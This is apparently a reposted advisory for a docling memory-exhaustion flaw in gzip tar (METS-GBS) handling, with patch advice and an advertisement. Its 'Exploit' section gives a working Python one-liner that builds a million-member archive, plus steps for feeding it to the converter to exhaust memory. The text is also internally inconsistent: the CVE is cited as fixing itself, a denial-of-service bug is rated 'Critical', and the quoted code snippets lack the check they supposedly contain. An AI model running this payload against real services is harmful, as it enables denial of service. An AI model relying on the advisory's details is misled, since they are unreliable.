Listen to this Post
CVE-2026-44018 is a memory exhaustion vulnerability in docling versions 2.91.0 through 2.130.x. When docling detects the input format of a gzip-compressed tar archive (METS-GBS), and later when the METS-GBS backend opens it, it calls tarfile.TarFile.getmembers(). This method builds the full member list in memory before the max_member_count limit is checked. A small archive with a very large number of empty members therefore makes docling allocate memory in proportion to the member count, and the limit has no effect. The vulnerability exists in docling/datamodel/document.py (format detection) and docling/backend/mets_gbs_backend.py, both of which iterate tar.getmembers() and count members inside the loop. getmembers() reads every header up front. Measured on Python 3.12, an archive of 1,000,000 empty members compresses to about 6.2 MB and makes getmembers() hold about 408 MB (about 66 times the input size). Format detection runs for any application/gzip input before allowed_formats is applied, so the allocation happens even when METS-GBS is not an allowed format. The check was introduced by the fix for CVE-2026-44018 (GHSA-r3xg-rg9j-67fv) in 2.91.0. The eager enumeration it relies on has been there since METS-GBS detection was added in 2.45.0. Impact includes memory exhaustion of the converting process, proportional to the size of the input archive. Confidentiality and integrity are not affected. Patches are fixed in docling 2.131.0 by 4412. Format detection and the METS-GBS backend now read archive members one at a time and stop as soon as max_member_count is exceeded, including when looking up page files. Workarounds for older versions include upgrading to 2.131.0, rejecting gzip or tar inputs before they reach docling when METS-GBS support is not needed, and running conversions of untrusted input with memory limits.
DailyCVE Form:
Platform: docling
Version: 2.91.0-2.130.0
Vulnerability: Memory exhaustion
Severity: Critical
date: 2026-10-06
Prediction: 2026-11-01
(end of form)
What Undercode Say
Analytics:
Check docling version: `pip show docling`
Generate malicious tar: `python3 -c “import tarfile,io; f=io.BytesIO(); t=tarfile.open(fileobj=f,mode=’w:gz’); [t.addfile(tarfile.TarInfo(’empty_%d’%i)) for i in range(1000000)]; t.close(); open(‘malicious.tar.gz’,’wb’).write(f.getvalue())”`
Measure memory usage: `python3 -c “import tarfile; t=tarfile.open(‘malicious.tar.gz’); m=t.getmembers(); print(len(m)); print(sum(1 for _ in m))”`
Format detection code snippet:
docling/datamodel/document.py
def detect_format(input_data):
if is_gzip(input_data):
with tarfile.open(fileobj=input_data, mode='r:gz') as tar:
members = tar.getmembers()
for member in members:
if member.name.endswith('.xml'):
return 'mets_gbs'
Backend code snippet:
docling/backend/mets_gbs_backend.py
def open(self, tar):
members = tar.getmembers()
for member in members:
if member.name.endswith('.xml'):
self.process_page(member)
Exploit: (Educational Purposes!)
- Create malicious archive: `python3 -c “import tarfile,io; f=io.BytesIO(); t=tarfile.open(fileobj=f,mode=’w:gz’); [t.addfile(tarfile.TarInfo(’empty_%d’%i)) for i in range(1000000)]; t.close(); open(‘malicious.tar.gz’,’wb’).write(f.getvalue())”`
2. Feed to docling: `from docling.document_converter import DocumentConverter; converter = DocumentConverter(); result = converter.convert(‘malicious.tar.gz’)`
3. Observe memory exhaustion as process allocates over 400 MB before any limit check.
Protection: from this CVE
Upgrade to docling 2.131.0. For older versions, reject gzip or tar inputs before they reach docling when METS-GBS support is not needed. Run conversions of untrusted input with memory limits.
Impact:
Memory exhaustion of the converting process, proportional to the size of the input archive. Confidentiality and integrity are not affected.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

